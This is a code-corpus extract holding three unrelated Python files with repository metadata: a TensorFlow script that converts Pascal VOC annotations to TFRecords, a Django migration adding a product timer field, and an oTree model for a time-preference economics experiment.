flags.DEFINE_string('label_map_path', 'data/pascal_label_map.pbtxt', 'Path to label map proto.')
flags.DEFINE_string('output_path', '', 'Path to output TFRecord.')
flags.DEFINE_boolean('include_masks', False, 'Add image/object/mask to TFRecord using png images in annotations folder.')
flags.DEFINE_boolean('ignore_difficult_instances', False, 'Whether to ignore difficult instances.')
FLAGS = flags.FLAGS
def getClassId(name, label_map_dict):
class_id = -1
for item_name, item_id in label_map_dict.items():
if name in item_name:
class_id = item_id
break
return class_id
def dict_to_tf_example(data, image_file, annotations_dir, label_map_dict, include_masks, ignore_difficult_instances):
with tf.gfile.GFile(image_file, 'rb') as fid:
encoded_jpg = fid.read()
encoded_jpg_io = io.BytesIO(encoded_jpg)
image = PIL.Image.open(encoded_jpg_io)
if image.format != 'JPEG':
raise ValueError('Image format not JPEG')
key = hashlib.sha256(encoded_jpg).hexdigest()
width = int(data['size']['width'])
height = int(data['size']['height'])
xmin = []
ymin = []
xmax = []
ymax = []
classes = []
classes_text = []
truncated = []
poses = []
difficult_obj = []
masks = []
if 'object' in data:
for idx, obj in enumerate(data['object']):
difficult = bool(int(obj['difficult']))
if ignore_difficult_instances and difficult:
continue
class_id = getClassId(obj['name'], label_map_dict)
if class_id < 0:
continue
difficult_obj.append(int(difficult))
xmin.append(float(obj['bndbox']['xmin']) / width)
ymin.append(float(obj['bndbox']['ymin']) / height)
xmax.append(float(obj['bndbox']['xmax']) / width)
ymax.append(float(obj['bndbox']['ymax']) / height)
classes_text.append(obj['name'].encode('utf8'))
classes.append(class_id)
truncated.append(int(obj['truncated']))
poses.append(obj['pose'].encode('utf8'))
if include_masks:
mask_path = os.path.join(annotations_dir, os.path.splitext(data['filename'])[0] + '_object' + str(idx) + '.png')
with tf.gfile.GFile(mask_path, 'rb') as fid:
encoded_mask_png = fid.read()
encoded_png_io = io.BytesIO(encoded_mask_png)
mask = PIL.Image.open(encoded_png_io)
if mask.format != 'PNG':
raise ValueError('Mask format not PNG')
mask_np = np.asarray(mask)
mask_remapped = (mask_np == 255).astype(np.uint8)
masks.append(mask_remapped)
feature_dict = {
'image/height': dataset_util.int64_feature(height),
'image/width': dataset_util.int64_feature(width),
'image/filename': dataset_util.bytes_feature(
data['filename'].encode('utf8')),
'image/source_id': dataset_util.bytes_feature(
data['filename'].encode('utf8')),
'image/key/sha256': dataset_util.bytes_feature(key.encode('utf8')),
'image/encoded': dataset_util.bytes_feature(encoded_jpg),
'image/format': dataset_util.bytes_feature('jpeg'.encode('utf8')),
'image/object/bbox/xmin': dataset_util.float_list_feature(xmin),
'image/object/bbox/xmax': dataset_util.float_list_feature(xmax),
'image/object/bbox/ymin': dataset_util.float_list_feature(ymin),
'image/object/bbox/ymax': dataset_util.float_list_feature(ymax),
'image/object/class/text': dataset_util.bytes_list_feature(classes_text),
'image/object/class/label': dataset_util.int64_list_feature(classes),
'image/object/difficult': dataset_util.int64_list_feature(difficult_obj),
'image/object/truncated': dataset_util.int64_list_feature(truncated),
'image/object/view': dataset_util.bytes_list_feature(poses),
}
if include_masks:
encoded_mask_png_list = []
for mask in masks:
img = PIL.Image.fromarray(mask)
output = io.BytesIO()
img.save(output, format='PNG')
encoded_mask_png_list.append(output.getvalue())
feature_dict['image/object/mask'] = (dataset_util.bytes_list_feature(encoded_mask_png_list))
example = tf.train.Example(features=tf.train.Features(feature=feature_dict))
return example
def main(_):
images_dir = FLAGS.images_dir
image_files = dataset_util.read_examples_list(FLAGS.image_list_path)
annotations_dir = os.path.join(images_dir, FLAGS.annotations_dir)
label_map_dict = label_map_util.get_label_map_dict(FLAGS.label_map_path)
writer = tf.python_io.TFRecordWriter(FLAGS.output_path)
for idx, image_file in enumerate(image_files):
print(idx, image_file)
image_file_split = image_file.split('/')
annotation_path = os.path.join(annotations_dir, os.path.splitext(image_file_split[-1])[0] + '.xml')
with tf.gfile.GFile(annotation_path, 'r') as fid:
xml_str = fid.read()
xml = etree.fromstring(xml_str)
data = dataset_util.recursive_parse_xml_to_dict(xml)['annotation']
tf_example = dict_to_tf_example(data, image_file, annotations_dir, label_map_dict, FLAGS.include_masks, FLAGS.ignore_difficult_instances)
writer.write(tf_example.SerializeToString())
writer.close()
if __name__ == '__main__':
tf.app.run()
|
[
"ryo@rectlabel.com"
] |
ryo@rectlabel.com
|
7c1d1a42ac22cdb4b343f2c5ebc05430930bacd4
|
325ff618114dd4af041f63049460b40cf6ce7c9d
|
/product/migrations/0009_product_left_time.py
|
d33402ba4b72c627806f4e366bdb57e3e0c1bf5c
|
[] |
no_license
|
dedysutanto/hkTimer-server
|
59f57fab3c9ca3ecf399f7d95ce6ec07e2487478
|
9c8e878ed79e99b7669cd1f7bc617835081ef3e9
|
refs/heads/master
| 2020-03-08T20:18:41.520894
| 2018-05-02T06:48:04
| 2018-05-02T06:48:04
| 128,378,784
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 395
|
py
|
# Generated by Django 2.0.4 on 2018-04-09 05:08
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('product', '0008_auto_20180409_1034'),
]
operations = [
migrations.AddField(
model_name='product',
name='left_time',
field=models.PositiveIntegerField(default=0),
),
]
|
[
"dedy.sutanto@proit.co.id"
] |
dedy.sutanto@proit.co.id
|
3b28f32042b7f9b9d50bcb9d65cd9eb7dd7bde8b
|
3f3eb47cdd679dcacaf78f3542efd7af058c7ae1
|
/EconExp1_TimePrefPronoun1_intro/models.py
|
fa15c3e925470c83d800577c451ec927d0470a7d
|
[] |
no_license
|
cczallen/josieslab-oTree
|
92d2193a07198960521a4e3026b805ebbec4336e
|
71aa0ec0420357208f18a18925b04dc5e32c5013
|
refs/heads/master
| 2021-04-04T17:49:49.346385
| 2020-04-11T13:02:28
| 2020-04-11T13:02:28
| 248,476,238
| 0
| 0
| null | 2020-04-11T13:02:29
| 2020-03-19T10:40:26
|
Python
|
UTF-8
|
Python
| false
| false
| 1,920
|
py
|
from otree.api import (
models,
widgets,
BaseConstants,
BaseSubsession,
BaseGroup,
BasePlayer,
Currency as c,
currency_range,
)
from EconExp1_TimePrefPronoun1_questionaire.models import (
OptionOfGetMoney,
WaitingPeriod,
GainedAmount,
Treatment,
)
author = 'Josie_NTULAB'
doc = """
決策實驗-說明部分
"""
class Constants(BaseConstants):
name_in_url = 'EconExp1_TimePrefPronoun1_intro'
players_per_group = None
num_rounds = 1
num_questions = len(WaitingPeriod) * len(GainedAmount)
pronoun = Treatment.pronoun
gained_amount_today = GainedAmount.get_TWD_today()
class Subsession(BaseSubsession):
def creating_session(self):
for p in self.get_players():
p.treatment_pronoun_included = Treatment.get_pronoun_included(p)
class Group(BaseGroup):
pass
class Player(BasePlayer): # TODO:有空再尋找能直接繼承(重複利用)EconExp1_TimePrefPronoun1_questionaire.models 裡 Player 的方法
# 幾週後 (hidden)
waiting_period = models.IntegerField()
# 獲得的報償 (hidden)
gained_amount = models.IntegerField()
treatment_pronoun_included = models.BooleanField(initial = False)
get_money_now_or_future = models.StringField(
label = '請選擇您要今天或未來的報酬',
widget = widgets.RadioSelect,
)
def get_money_now_or_future_choices(self):
return [
['now', OptionOfGetMoney.formatted_option(self, OptionOfGetMoney.OPTION_NOW)],
['future', OptionOfGetMoney.formatted_option(self, OptionOfGetMoney.OPTION_FUTURE)],
]
# 聽了幾次,單位為次數 (hidden,根據使用者行為紀錄)
num_listen_times = models.IntegerField(initial = 0)
# 決策時長,單位為秒數 (hidden,根據使用者行為紀錄)
decision_duration = models.FloatField(initial = 0)
|
[
"cczallen@gmail.com"
] |
cczallen@gmail.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.